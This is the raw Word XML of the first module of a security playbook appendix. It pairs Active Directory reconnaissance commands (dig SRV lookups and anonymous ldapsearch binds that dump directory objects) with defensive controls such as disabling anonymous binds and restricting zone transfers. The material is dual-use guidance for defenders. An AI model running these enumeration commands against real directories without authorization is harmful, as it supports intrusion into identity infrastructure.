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35CC" w14:textId="42C07E24" w:rsidR="00B56192" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix X: </w:t>
      </w:r>
      <w:r w:rsidR="00EB0454" w:rsidRPr="00442C76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FICAM Assurance &amp; Threat Si</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tuational</w:t>
      </w:r>
      <w:r w:rsidR="00EB0454" w:rsidRPr="00442C76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Playbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA1184" w14:textId="350BC659" w:rsidR="00EB0454" w:rsidRPr="00676591" w:rsidRDefault="00EB0454" w:rsidP="00EB0454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This playbook aligns offensive exploit mechanics with enterprise defensive mitigation controls required to protect the Identity Provider (IdP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FA289" w14:textId="010BF0B9" w:rsidR="00EB0454" w:rsidRPr="00676591" w:rsidRDefault="00EB0454" w:rsidP="00EB0454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FICAM Identity Architecture &amp; Threat Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564CF74" w14:textId="057915B6" w:rsidR="00345479" w:rsidRPr="00676591" w:rsidRDefault="00EB0454" w:rsidP="00AE37E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[Client/Subject] -</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Authenticating Domain Controller / IdP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E362FBA" w14:textId="09B51FC6" w:rsidR="00345479" w:rsidRPr="00294E91" w:rsidRDefault="00345479" w:rsidP="00EB0454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Module 1</w:t>
      </w:r>
      <w:r w:rsidR="00681BC3" w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Infrastructure Discovery and Identity Enumeration (LDAP/DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2556B9E4" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00345479">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702CABAC" w14:textId="0EEC9682" w:rsidR="00345479" w:rsidRDefault="00345479" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Profile the FICAM Identity Store topology, locate naming contexts, and identify high-value security subjects (Service Accounts, Privileged Groups).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C244803" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="00676591" w:rsidRDefault="009270EB" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162FFD5C" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00345479">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71DC6C48" w14:textId="5C6B29D0" w:rsidR="00345479" w:rsidRPr="00676591" w:rsidRDefault="00345479" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement Least Privilege Directory Access.</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevent unauthenticated or low-privileged directory harvesting by enforcing LDAP Signing, Channel Binding, and Access Control List (ACL) restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF02F79" w14:textId="7A017EC7" w:rsidR="00345479" w:rsidRPr="00681BC3" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F849E2" w14:textId="4F546026" w:rsidR="00345479" w:rsidRPr="00681BC3" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Infrastructure Mapping (DNS Server SRV Verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A033B8" w14:textId="0CA4DA3E" w:rsidR="00345479" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify target authoritative infrastructure mapped to the Identity Provider (IdP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6125BE" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00676591" w:rsidRDefault="00681BC3" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CE42C4" w14:textId="0AF445EC" w:rsidR="00345479" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00345479">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6EEE4735" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B473677" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00681BC3" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DFDCB85" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Query Active Directory Global Catalogs and LDAP SRV records</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7573F9" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dig srv _ldap._tcp.dc._msdcs.domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">local </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@&lt;DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50EEFC4F" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dig srv _gc._tcp.domain.</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="0F9ED5" w:themeColor="accent4"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">local </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@&lt;DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A530B88" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FC38E76" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C75539" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00345479">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Defensive Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFCC31" w14:textId="50E0BD34" w:rsidR="00345479" w:rsidRPr="00681BC3" w:rsidRDefault="00345479" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Restrict DNS zone transfers (AXFR) and implement network-level ACLs to ensure only authorized segments can query core infrastructure SRV records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2E477" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00676591" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691CD86A" w14:textId="2B8BD268" w:rsidR="00345479" w:rsidRPr="00681BC3" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unauthenticated Identity Store Enumeration (LDAP Null Bind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45438041" w14:textId="0B83A094" w:rsidR="00345479" w:rsidRPr="00676591" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identify whether the IdP permits anonymous access to its schema and configuration contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83E600" w14:textId="77777777" w:rsidR="00345479" w:rsidRPr="00676591" w:rsidRDefault="00345479" w:rsidP="00345479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51302874" w14:textId="3DD357E8" w:rsidR="00345479" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00681BC3">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5837956B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF09E1C" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28F80706" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Discover naming contexts via a Null Bind session</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">ldapsearch -x -h </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -s base namingcontexts</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>ldapsearch -LLL -x -H ldap://</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="666600"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -b </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"DC=domain,DC=local"</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>"(objectClass=*)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452FDCD4" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40A19EF9" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C68C5B4" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00345479" w:rsidP="00345479">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Defensive Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4461A5" w14:textId="00B2ED88" w:rsidR="00345479" w:rsidRPr="00676591" w:rsidRDefault="00345479" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous LDAP binds by setting </w:t>
      </w:r>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DsHeuristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters appropriately and enforcing Group Policy Object (GPO): </w:t>
      </w:r>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Network access: Do not allow anonymous enumeration of SAM accounts and shares</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
